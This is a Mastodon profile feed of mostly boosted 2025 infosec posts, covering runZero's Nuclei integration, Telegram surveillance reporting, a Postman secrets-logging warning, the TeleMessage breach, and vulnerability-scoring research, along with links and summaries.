mathew

@[email protected]
25 Followers
9 Following
476 Posts
"You learn something new every day, if you're not careful." — Wilf Lunn
LocationDuluth, MN
mathewJun 12, 2025
runZero, IncJun 11, 2025

Exciting news for open source + vuln nerds alike: runZero now speaks Nuclei!

We 🩵 open source and are beyond excited to announce that we have added initial support for ProjectDiscovery’s open source Nuclei scanner — kicking off with safe, targeted checks for default and weak web credentials across IT, OT, IoT, and cloud environments.

Check out today's post from @todb to see how we:

✅ Curated ~180 safe, non-disruptive templates
✅ Only run checks when services are positively fingerprinted
✅ Keep scans fast, polite, and precise — even in fragile ICS environments

This is just the beginning. More protocols, smarter checks, and community collaboration ahead!

👉 Check it out: https://www.runzero.com/blog/integrating-nuclei/

mathewJun 10, 2025
Michał "rysiek" Woźniak · 🇺🇦Jun 10, 2025

Remarkable investigation into Telegram by IStories (in Russian):
https://www.istories.media/stories/2025/06/10/kak-telegram-svyazan-s-fsb/

English version by OCCRP:
http://www.occrp.org/en/investigation/telegram-the-fsb-and-the-man-in-the-middle

tl;dr:

👉 Telegram uses a single company with ties to the Russian FSB as their sole infrastructure provider, globally.

👉 Combined with a cleartext device identifier Telegram's protocol requires to be prepended to all encrypted messages, this allows for global surveillance of Telegram users.

I am quoted in this story.

#Telegram #InfoSec #Privacy

Как «Телеграм» связан с ФСБ

За инфраструктуру мессенджера отвечают те, кто обслуживает секретные комплексы российских спецслужб, используемые для слежки за гражданами

mathewMay 29, 2025
Shortly after waking up I got a possible fraud attempt notification from AmEx. 15 minutes later, I'd canceled the card. Sorry not sorry, thief.
mathewMay 29, 2025
nixCraft 🐧May 29, 2025
10 MB hard disk from the 1960's
mathewMay 29, 2025
Zack WhittakerMay 29, 2025

For TechCrunch, I wrote about Thinkst Canary, a bootstrapped maker of honeypots (for catching hackers), which this month marks its 10th anniversary. The company now brings in $20 million in ARR without VC funding or an outbound sales team.

Refreshing at a time when cyber is dominated by VC dollars.

https://techcrunch.com/2025/05/29/a-decade-in-bootstrapped-thinkst-canary-reaches-20m-in-arr-without-vc-funding/

A decade in, bootstrapped Thinkst Canary reaches $20M in ARR without VC funding | TechCrunch

Reflecting on 10 years since its launch, the honeypot maker explains why the company did not take on any VC funding.

TechCrunch
mathewMay 19, 2025
HD MooreMay 19, 2025
A PSA for why you should probably not use Postman (it can leak secrets to them): https://anonymousdata.medium.com/postman-is-logging-all-your-secrets-and-environment-variables-9c316e92d424
Postman is logging all your secrets and environment variables

I was originally investigating this report that Postman is not HIPAA compliant. I found that Postman is not just wholly unsuitable for anyone testing a healthcare application — it has virtually zero…

Medium
mathewMay 19, 2025
Micah LeeMay 18, 2025
Here's how the TM SGNL server, which had access to plaintext chat logs from people like Mike Waltz, got hacked in about 20 minutes https://www.wired.com/story/how-the-signal-knock-off-app-telemessage-got-hacked-in-20-minutes/ (my first article in WIRED!)
How the Signal Knockoff App TeleMessage Got Hacked in 20 Minutes

The company behind the Signal clone used by at least one Trump administration official was breached earlier this month. The hacker says they got in thanks to a basic misconfiguration.

WIRED
mathewMay 19, 2025
Antoine SchmittMay 16, 2025

Malware attack and counterattack

This is the story of a phishing, of a hacking, of what I learned, and how I counterattacked The phishing It all started with an email from a journalist who wanted to interview me about my artistic work. The email was from a certain Eirik Halvorsen, coming on the behalf of an online art magazine, Artscope. This happens to me regularly, but this time, the email was so cleanly and formally written that I told my friends that it looked like it had been written by an AI.     But it was […]

https://www.antoineschmitt.com/malware-attack-and-counterattack/

mathewMay 16, 2025
daniel:// stenberg://May 16, 2025

Detecting malicious Unicode in #curl

https://daniel.haxx.se/blog/2025/05/16/detecting-malicious-unicode/

Detecting malicious Unicode

In a recent educational trick, curl contributor James Fuller submitted a pull-request to the project in which he suggested a larger cleanup of a set of scripts. In a later presentation, he could show us how not a single human reviewer in the team nor any CI job had spotted or remarked on one of … Continue reading Detecting malicious Unicode →

daniel.haxx.se
mathewMay 14, 2025
runZero, IncMay 14, 2025

⚡ New Research Report⚡ Divining risk isn’t just for mystics. Defenders do it every day — reading signals, spotting patterns, and deciding what really matters. In our latest report, @todb breaks down the three scoring systems at the core of modern triage: CVSS, EPSS, and SSVC.

What’s inside:

👉 A breakdown of CVSS, EPSS, and SSVC — how they work, where they mislead, and what signals are actually useful

👉 Data-backed insights from analyzing 270,000+ CVEs, including the biggest EPSS score movers and what they reveal

👉 Practical guidance on combining scores with PoCs, asset context, and data to triage smarter

This isn’t a teardown. It’s a practical guide for interpreting risk through a sharper, more intuitive lens.

Read it here and tell us what you think: https://www.runzero.com/resources/deciphering-signals-from-vulnerability-scores/

Divining Risk: Deciphering Signals From Vulnerability Scores

Vuln scores aim to clarify but often create noise. We analyzed 270k+ CVEs to see what CVSS, EPSS & SSVC reveal – and what they don't.

runZero